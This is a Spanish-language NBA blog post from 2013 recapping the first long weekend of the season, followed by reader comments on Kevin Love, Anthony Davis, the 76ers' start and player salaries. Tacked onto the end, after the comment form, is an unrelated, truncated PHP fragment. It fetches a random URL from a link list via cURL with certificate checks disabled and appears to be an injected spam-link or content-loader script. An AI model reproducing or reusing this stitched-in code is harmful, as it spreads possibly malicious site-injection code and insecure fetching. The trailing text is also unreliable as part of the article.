Informe del fin de semana: No tanking

04 de November de 2013 por TheDeerHunter

Mucho que comentar en este primer fin de semana largo. Como siempre, aprovechamos los comentarios de los que habéis pasado por el blog durante el puente. Empezamos por la madrugada del jueves:

“Duelo bestial ayer en Los Angeles entre Chris Paul y Stephen Curry. Paul hizo el mejor partido que yo le haya visto a un base en directo, y seguramente uno de los 10 mejores que le haya visto a cualquier jugador. Curry dio esa sensación que me suele transmitir de que en su cabeza no existe el término ‘difícil’ dentro de una cancha de baloncesto.” Viva_Dirk

En efecto, el espectáculo que nos brindaron Curry y Paul durante la noche de Halloween fue cercano a lo antológico. Yo no me atrevería a decir tanto ya que era un simple partido de regular con las defensas casi en pretemporada pero el duelo fue tremendo. En realidad los Warriors no se llevaron un castigo mayor gracias al talento mágico de Curry (9 de 14 en triples… y qué triples) pero es que Paul estuvo en todas. Los Clippers en general, y Griffin en particular, rayaron a buen nivel, aunque aún se encuentran en fase de acople. Buen partido para todas las rajadas que acumulaban los angelinos en poco tiempo (115-126).

El partido entre Bulls y Knicks, en comparación, fue bastante malillo (81-82). Terminó resolviéndose con una genialidad de Rose a pesar de no haber jugado un buen partido, tras unos minutos finales en los que parecía que nadie quería ganar. 

Pasamos a la noche del viernes…

“Viendo el 76ers – Wizards y los capitalinos les están pegando una buena tunda al final del primer cuarto. Supongo que esta es la realidad de los 76ers, pero al menos le podrían poner intensidad, es que están defendiendo con la mirada (Wall 15 puntos sin fallo de momento). A este nivel pierden de 40 cada partido.” Noelinho

Pues como el propio compañero nos terminaba contando en directo los ¿infravalorados? Sixers superaban a los Wizards en los tres siguientes cuartos y se llevaban su segunda victoria consecutiva (y subiendo). Alguien comentó que esto podía dejar tocado a Randy Wittman (109-102).

En el blog también se habló de la mala pinta de los nuevos Celtics (tras dejar escapar un partido relativamente controlado ante Milwaukee; 105-98); de la brillante victoria de los Wolves ante Thunder (o de su falta de ideas sin Westbrook; 81-100); de la mini crisis de Miami ante una escuadra tan profunda como Brooklyn (100-101); de la vuelta a la realidad de Lakers ante Parker y los Spurs (91-85); de los shophomore Davis (a pesar de la derrota de los Pelicans en Orlando; 90-110) y Drummond (también derrota de Pistons en Memphis; 108-111) así como del pésimo comienzo de Denver (derrotados claramente en casa por Portland; 113-98).

Os dejásteis en el tintero la gran actuación de James Harden en la victoria de Houston ante Dallas (105-113) o la victoria de Clippers en Sacramento, nuevamente con Griffin destacado (110-101). Destacada también la sufrida segunda victoria de Phoenix ante Utah en casa (otros que se niegan a tanquear; 84-87) o las victoria de Hawks ante Raptors (95-102) y de Cavaliers en Charlotte (84-90).

Y el sábado…

“Y otra más de los 76ers, contra Chicago remontando hasta 16 puntos en contra”. Franitis

En efecto, Carter-Williams culminaba su inicio mágico con otra magnífica exhibición, ante Rose para más inri (104-107). Por su parte, Anthony Davis destrozó a unos Bobcats que siguen sin Jefferson (84-105) y, por si faltaba algo en Houston, Parsons fue el mejor de los suyos en su victoria en Salt Lake (la tercera, líderes del Oeste; 104-93)

En el resto de partidos del día, los Cavs sufrieron la solvencia defensiva de Indiana (74-89), los Grizzlies constataron sus problemas defensivos de este comienzo de curso en Dallas (99-111), Gay lideró a los Raptors en Milwaukee a pesar de que en Toronto empieza a oler a tanqueo (97-90), Batum firmó un triple doble con sabor a victoria aprovechando el back-to-back de Spurs (105-115) y los Warriors dieron buena cuenta de los Kings en un partido que Demarcus Cousins vio en su mayor parte desde el banquillo (87-98).

Finalmente, esta pasada madrugada nos ha dejado la victoria de los Magic ante los Nets en el estreno de Jason Kidd como entrenador (86-107). Entre Oladipo, Vucevic y Nicholson hicieron la vida imposible a Garnett, Pierce y los suyos. Miami recuperó la senda de la victoria y endosó la tercera derrota de la temporada a los Wizards que siguen sin estrenarse (93-103), lo mismo que los Celtics que fueron superados por unos Pistons en los que volvió Brandon Jennings convenientemente enmascarado (77-87). Los Wolves, en cambio, van 3-0 gracias a su victoria en el Madison Square Garden (109-100). Entre Kevin Love y Kevin Martin desquiciaron a los neoyorquinos. Los Lakers vencieron a los Hawks a pesar del acierto de Kyle Korver (6 de 6 en triples) y los Suns perdieron ante los Thunder en el retorno de Russell Westbrook (96-103). El base consiguió 21 puntos y 7 asistencias y a Durant le cambió la cara.

PREMIOS

MVP: Kevin Love está a nivel MVP y como los Wolves continúen a este ritmo habrá que tenerle muy en cuenta. El viernes consiguió 24 puntos y 12 rebotes en 29 minutos y ayer se fue a los 34 puntos, 15 rebotes y 4 asistencias ante los Knicks. Anthony Davis es otro que ha empezado como una moto. Si el viernes consiguió 26 puntos y 17 rebotes, al día siguiente, sábado, se fue a los 25 puntos, 8 rebotes, 4 asistencias, 6 robos y 6 tapones, a punto de conseguir un 5-5. La exhibición de Chris Paul ante los Warriors por si sola ya merecería un lugar en este apartado pero a los 42 puntos, 15 asistencias y 6 robos de aquel día, le podemos sumar los 26 puntos y 10 asistencias del día siguiente.

Rookie: Michael Carter-Williams representa el momento mágico de los Sixers. Contra los Wizards consiguió 14 puntos y 5 asistencias pero ante los Bulls volvió a las andadas y se fue a los 26 puntos, 10 asistencias y 3 robos. El otro rookie destacado ha sido Victor Oladipo que ha conseguido 2 victorias con los Magic. El viernes fueron 10 puntos, 6 rebotes, 6 asistencias y 4 robos y ayer 19 puntos, 6 rebotes y 4 asistencias.

Sorpresa: Evidentemente, los Philadelphia 76ers. ¿A cuanto se debía pagar un inicio de 3-0 con semejante calendario?

Comenta

20 comentarios a esta entrada

  1. Esteban dice:
    #1

    “Anthony Davis es otro que ha empezado como una moto. Si el viernes consiguió 26 puntos y 17 rebotes, al día siguiente, sábado, se fue a los 25 puntos, 8 rebotes, 4 asistencias, 6 robos y 6 tapones, a punto de conseguir un 5-5”

    este chaval esta para cosas mayores sin duda, para marcar epoca; brazos y manos de un pivote, y agilidad y velocidad de un alero, ademas de un certerisimo tiro a media distancia, impecable en libres, y una intensidad defensiva impropia de un talentoso como el

      Citar

  2. Esteban dice:
    #2

    muy bueno de los wolves, con uan formacion mas ortodoxa que la de la temporada pasada, con un esoclta tirador jugandod e escolta tirador y no ridnur, y un kevin love en estado de gracia absoluta, un entrenador importante, los veo bien bien

      Citar

  3. Esteban dice:
    #3

    regreso a las apuradas de westbrook, se estaban poniendo feas las cosas en el thunder y despues de lo que sufrieron anoche, no estan tampoco mucho mejor

    pensar que algun iluminado prefirio darle el contrato a ibaka y no a harden, en que estaba pensando?

      Citar

  4. Pop dice:
    #4

    Si sigue este camino esta temporada va a molar mucho. Y qué ganas tenía de ver al Love de otro tiempo y al Davis que todos esperábamos.

    @Esteban. Eres de los que más aportan y comentan por aquí (aunque no esté de acuerdo contigo muchas veces, jeje), por eso, con todo respeto, te quería pedir un favor: ¿podrías usar puntuaciones y, sobre todo, mayúsculas? A mí por lo menos se me hace insufrible leerte muchas veces.

      Citar

  5. TheDeerHunter dice:
    #5

    Esteban:

    pensar que algun iluminado prefirio darle el contrato a ibaka y no a harden, en que estaba pensando?

    Esteban… Harden se iba al máximo de cabeza.
    Con Durant y Westbrook es imposible que le hubieran renovado independientemente de Ibaka.

      Citar

  6. HisRoyalAirness dice:
    #6

    Ayer los Wolves les metieron 40 puntos en el primer cuarto a los Knicks. Abucheos en el Garden y árbitros caseros para permitir una pequeña esperanza.
    Kevi Love is a BEAST

      Citar

  7. rumbero dice:
    #7

    Los promedios de Love en los 4 últimos partidos que ha jugado contra los Knicks (en el que está el famoso 31+31) son de 32.5 puntos y 20.5 rebotes. Brutality

      Citar

  8. Esteban dice:
    #8

    El otro equipo que veo muy bien es detroit

    a Drummond le falta y mucho, esta verde pero aun así se marca unos partidazos, y la dupla con monroe realmente funciona bien

    cheeks me parece un técnico genial y ha armado una buena rotación de 9 jugadores, que de todo salir bien, debería pelear por la sexta posición de el este

      Citar

  9. Ruxixón dice:
    #9

    Esteban:
    El otro equipo que veo muy bien es detroit

    a Drummond le falta y mucho, esta verde pero aun así se marca unos partidazos, y la dupla con monroe realmente funciona bien

    Verdaderamente yo haría extensible ese comentario a Josh Smith,que el pobre es un tio que suele recibir bastantes críticas pero de momento está haciendo porque la cosa funcione.Por supuesto todo bajo la tutela de Cheeks,que tendrá su parte de mérito y ahora más pues “El enemigo de Ricky” Jennings está de vuelta.La mala noticia es la desaparición de KCP de la rotación.

    A ver lo que aguanta Wittman,ya el otro día hizo unas declaraciones subidas de tono.@76ers,Nets y @Thunder es el calendario.¿Huele a Lionel Hollins?

      Citar

  10. Denise dice:
    #10

    Esteban:
    El otro equipo que veo muy bien es detroit

    a Drummond le falta y mucho, esta verde pero aun así se marca unos partidazos, y la dupla con monroe realmente funciona bien

    cheeks me parece un técnico genial y ha armado una buena rotación de 9 jugadores, que de todo salir bien, debería pelear por la sexta posición de el este

    Cheeks es un gran tecnico, en los 76ers para mi gusto, lo hizo francamente bien. Yo siempre les he dado la 6º plaza, pero ese Big 3 interno Smith-Monroe-Drummond se estan conjuntando bien y dan miedo por lo que para mi no sería descabellado que acabasen 4º por delante de Nets y Knicks

    Los Nets mal, no quiero ser ventajista, desde el minuto 1 no me convence el equipo como asi lo expuse en el analisis. Garnett y Pierce estan acabados, Deron es de lo mas sobrevalorado que he visto en los ultimos años y desde que salió de Utah no ha hecho nada en 3 años, y Jo-Jo es un Guti del basket, 2 dias buenos y 20 malos. Lo unico por lo que creo que pueden llegar al anillo es por el banquillazo que tienen y por Lopez que en cuanto a calidad/fundamentos creo que es el mejor center de la liga,
    Y Kidd creo que va a ser un cancer, no sé, pero no lo veo como el tipico ex-jugador crack motivado para entrenar. Y asi de primeras meterse a lidiar ese banquillo con tantos egos, creo que va a salir escaldado. De momento no me gusta su juego, por decir algo, porque los Nets en los rattillos que he visto vs Heat y Magic, no juegan a absolutamente nada, en defensa son monjitas, y los 3 tios que mas se parten el pecho como Evans, Kirilenko y Anderson juegan demasiado poco.

    Los Magic bastante bien de momento, pero era de esperar, el año pasado iban con un balance de 12-13 hasta que Glen Davis se lesionó y perdieron como 25 partidos consecutivos. Pero el bloque de jovenes es solido. Me está gustando bastante Nicholson, que el año pasado hizo unos ultimos 4 meses horribles y ahora ha empezado muy bien.
    Afflalo genial, 20-5-5 de media y 55% en triples. Si siguiese en esta linea, los Magic podrian obtener jugadores rondas bastante valiosas por parte de algun contender al anillo ¿Oklahoma? Si nos diesen a Lamb y su primera ronda si la tienen sería cojonudo.
    Oladipo teniendo en cuenta como lo estan haciendo de momento McLemore, Bennet, Zeller, Len, (desde el primer video que vi de él me parecio un paquete) y demas rookies tops, ya creo que podemos hablar que es un gran pick por parte de Orlando. Pero aun debe mejorar las perdidas, es indecente que lleve casi 5 perdidas por choque y tambien se esta comiendo un montón de pinchos de merluza, posiblemente sea el jugador exterior que mas gorros le hayan puesto en lo que llevamos de liga.

    ¿Alguien que siga a los Wolves puede decirme por qué no le dan bola a Muhammad? Habra que probar al chaval digo yo…

      Citar

  11. GreenPride dice:
    #11

    Y el equipo de la primera semana de competición son…. Los Philadelphia 76rs con victorias nada menos que ante Miami y Chicago además de Washington. NBA o Where Amazing Happens, el que muchos catalogaban como aspirante al peor equipo de la historia va y se saca un novato de la manga y gana los 3 partidos. Caerán pero que les quiten lo bailao en este inicio de temporada.
    Del resto empiezan fuertes confirmando espectativas Indiana y Houston, como un cohete los Wolves y como se podía esperar equipos de los fuertes como Clippers, Golden State, Spurs y los Thunder en el Oeste. Los contendientes del Este, quitando a Indiana empiezan al tran-tran y ni Nets, ni Bulls ni Knicks, ni Heat han empezado muy puestos lo que les puede dar a los Pacers una interesante ventaja si la situación se amplía. Mejor de lo esperado a parte de los Sixers equipos como Orlando, Detroit, Toronto o Phoenix.
    Y camino al olvido mis Celtics y Utah principalmente, qué lástima…
    Es de esperar que poco a poco los favoritos vayan cogiendo la onda y los débiles empiecen a perder partidos como se supone pero aun quedarán algunas semanas así creo yo

      Citar

  12. Esteban dice:
    #12

    los 76ers han sido la sensacion, pero no parece muy duradero lo de ellos

    ahora, quiza era momento de darle las riendas del equipo a turner para que este responda, y quien te dice se vuelva un jugador franquicia,

      Citar

  13. Jose Luis dice:
    #13

    Pues yo creo que es el momento de traspasar a Turner y/o Young y quizá hasta Hawes. Aunque Turner puede ser un buen jugador complemento, veremos si no quiere subirse a la parra con la renovación. 24 x 4 años, quizá 28, lo vería bien.

    Thaddeus está cobrando 18 millones por 2 temporadas, creo que debería irse.

      Citar

  14. Esteban dice:
    #14

    Jose Luis:
    Pues yo creo que es el momento de traspasar a Turner y/o Young y quizá hasta Hawes. Aunque Turner puede ser un buen jugador complemento, veremos si no quiere subirse a la parra con la renovación. 24 x 4 años, quizá 28, lo vería bien.

    Thaddeus está cobrando 18 millones por 2 temporadas, creo que debería irse.

    No se, hoy por hoy cualquiera cobra 8 o 10 millones en la liga, no me parece caro, cualquier titular de la iga esta cobrando eso

      Citar

  15. Ruxixón dice:
    #15

    Por ejemplo Hayward,rumores de que pide 12 por año.Para llevarse las manos a la cabeza en mi opinión y es que por mucho que sea lo único decente del equipo durante varios años,no puedes irte a esos guarismos.Un 8 millones y subiendo hasta 10 creo que es lo suyo.

    Pero si,cualquiera pide un pastizal…ya veremos dentro de 5 años a ver si no estamos con lockouts y cosas de esas.

      Citar

  16. Denise dice:
    #16

    Ruxixón:
    Por ejemplo Hayward,rumores de que pide 12 por año.Para llevarse las manos a la cabeza en mi opinión y es que por mucho que sea lo único decente del equipo durante varios años,no puedes irte a esos guarismos.Un 8 millones y subiendo hasta 10 creo que es lo suyo.

    Pero si,cualquiera pide un pastizal…ya veremos dentro de 5 años a ver si no estamos con lockouts y cosas de esas.

    Yo a Hayward no le ofrezco mas de 6’5 millones. Ese tio si que me parece un autentico hacenumeros que se beneficia individualmente de jugar en una basura de equipo, y ni aun así es que destaque mucho.
    Otra cosa es que los Jazz le paguen 10 kilos porque con la dificultad que tienen para traer agentes libres, prefieran darle la pasta a éste antes que tener que darsela a otro, pero en mi opinión con un contrato de 3 temporadas a 20 millones y va sobrado.

      Citar

  17. Esteban dice:
    #17

    hablando de que YOUNG cobra mucho, lo cierto que es un tio que hace años viene rindiendo aceptable mente en el rol que le toca, incluso saliendo de la banca y jugando de 3/4

    favors, antes de su primer año como titular, ya firmo un contratazo superior al de young, y si bien se le ve muchísimo potencial, solo es eso, potencial y el próximo año estará en 10 millones y subiendo

      Citar

  18. Jose Luis dice:
    #18

    Pero cobra mucho para estar compitiendo en el equipo en el que está. ¿No sería mejor sacar un par de rondas o un jovencito interesante y alguna ronda por él? Vamos, digo yo… prefiero pagarle 10 millones a Turkoglu y traerme un par de rondas que pagarle 9 millones a Young.

      Citar

  19. HisRoyalAirness dice:
    #19

    Denise: Cheeks es un gran tecnico, en los 76ers para mi gusto, lo hizo francamente bien. Yo siempre les he dado la 6º plaza, pero ese Big 3 interno Smith-Monroe-Drummond se estan conjuntando bien y dan miedo por lo que para mi no sería descabellado que acabasen 4º por delante de Nets y Knicks

    Los Nets mal, no quiero ser ventajista, desde el minuto 1 no me convence el equipo como asi lo expuse en el analisis. Garnetty Pierce estan acabados, Deron es de lo mas sobrevalorado que he visto en los ultimos años y desde que salió de Utah no ha hecho nada en 3 años, y Jo-Jo es un Guti del basket, 2 dias buenos y 20 malos. Lo unico por lo que creo que pueden llegar al anillo es por el banquillazo que tienen y por Lopez que en cuanto a calidad/fundamentos creo que es el mejor center de la liga,
    Y Kidd creo que va a ser un cancer, no sé, pero no lo veo como el tipico ex-jugador crack motivado para entrenar. Y asi de primeras meterse a lidiar ese banquillo con tantos egos, creo que va a salir escaldado. De momento no me gusta su juego, por decir algo, porque los Nets en los rattillos que he visto vs Heat y Magic, no juegan a absolutamente nada, en defensa son monjitas, y los 3 tios que mas se parten el pecho como Evans, Kirilenko y Anderson juegan demasiado poco.

    Los Magic bastante bien de momento, pero era de esperar, el año pasado iban con un balance de 12-13 hasta que Glen Davis se lesionó y perdieron como 25 partidos consecutivos. Pero el bloque de jovenes es solido. Me está gustando bastante Nicholson, que el año pasadohizo unos ultimos 4 meses horribles y ahora ha empezado muy bien.
    Afflalo genial, 20-5-5de media y 55% en triples. Si siguiese en esta linea, los Magic podrian obtener jugadoresrondas bastante valiosas por parte de algun contender al anillo ¿Oklahoma? Si nos diesen a Lamb y su primera ronda si la tienen sería cojonudo.
    Oladipo teniendo en cuenta como lo estan haciendo de momento McLemore, Bennet, Zeller, Len,(desde el primer video que vi de él me parecio un paquete) y demas rookies tops, ya creo que podemos hablar que es un gran pick por parte de Orlando. Pero aun debe mejorar las perdidas, es indecente que lleve casi 5 perdidas por choque y tambien se esta comiendo un montón de pinchos de merluza, posiblemente sea el jugador exterior que mas gorros le hayan puesto en lo que llevamos de liga.

    ¿Alguien que siga a los Wolves puede decirme por qué no le dan bola a Muhammad? Habra que probar al chaval digo yo…

    Pues porque las rotaciones de Adelman siempre han sido un misterio. De hecho algún partido un jugador juega 20 minutos y al siguiente cero (Derrick Williams), o te sienta a Pekovic todo el último cuarto contra Orlando. Pero el tema es que hace al equipo funcionar y están jugando realmente bien. El perímetro está haciendo lo que a él le gusta y el único guard que entra por los titulares es Barea (Muhammad por muy forward que digan no tiene altura para eso)

      Citar

  20. rumbero dice:
    #20

    Ojo con la que han liado estos Clippers que tan mal pintan. 137 puntazos a los Rockets con momentos en la primera parte de verdadera orgía.
    No tuve la suerte de ver el Paul vs Curry del fin de semana del que tan bien habláis pero vaya exhibición que ha dado hoy en 30 minutos. 23-17 y riéndose de la defensa de Houston en cada ataque. Muy bien Griffin, y Redick.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>